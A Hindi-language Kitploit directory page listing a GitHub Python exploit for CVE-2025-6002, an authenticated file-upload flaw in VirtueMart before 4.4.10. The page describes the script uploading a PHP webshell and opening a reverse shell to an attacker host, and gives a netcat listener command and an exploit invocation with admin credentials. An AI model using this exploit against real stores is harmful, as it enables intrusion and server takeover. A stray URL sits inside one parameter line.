Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-6002 — CVE-2025-6002 के लिए पायथन एक्सप्लॉइट जो VirtueMart < 4.4.10 में प्रमाणित मनमाना फ़ाइल अपलोड को लक्षित करता है। लॉग इन करता है, एक PHP वेबशेल अपलोड करता है, और पेनिट्रेशन परीक्षण के लिए रिवर्स शेल ट्रिगर करता है। | Kitploit
उपकरण/GitHubGitHub/schn1tzelme1ster/cve-2025-6002
पेलोड जनरेशनभेद्यता विश्लेषणशोषणशेलकोडवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubschn1tzelme1ster/cve-2025-6002

CVE-2025-6002

CVE-2025-6002 के लिए पायथन एक्सप्लॉइट जो VirtueMart < 4.4.10 में प्रमाणित मनमाना फ़ाइल अपलोड को लक्षित करता है। लॉग इन करता है, एक PHP वेबशेल अपलोड करता है, और पेनिट्रेशन परीक्षण के लिए रिवर्स शेल ट्रिगर करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
4 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-6002 के लिए शोषण

यह स्क्रिप्ट VirtueMart < 4.4.10 (CVE-2025-6002) में प्रमाणित मनमानी फ़ाइल अपलोड भेद्यता का शोषण करती है, जिसका वर्णन इस ब्लॉग पोस्ट में किया गया है: https://blog.blacklanternsecurity.com/p/doomla-zero-days

यह स्क्रिप्ट दिए गए क्रेडेंशियल्स के साथ VirtueMart में लॉग इन करती है, एक नया उत्पाद बनाती है और एक PHP वेबशेल को मीडिया फ़ाइल के रूप में अपलोड करती है। फिर यह प्रदान किए गए IP/पोर्ट पर एक रिवर्स शेल को लागू करती है।

पैरामीटर:

  • --url: VirtueMart का URL
  • --username: व्यवस्थापक उपयोगकर्ता नाम
  • --password: व्यवस्थापक पासवर्ड
  • --remote-ip: हमलावर का IP पताhttps://github.com/schn1tzelme1ster/CVE-2025-6002/tree/main
  • --remote-port: हमलावर का पोर्ट

उपयोग:

  1. हमलावर मशीन पर Netcat चलाएँ:
root@kitploit:~
nc -nlvp 1337
  1. शोषण निष्पादित करें:
root@kitploit:~
python3 exploit.py --url http://x.x.x.x --username admin --password kartoffel --remote-ip x.x.x.x --remote-port 1337
टूल डाउनलोड करें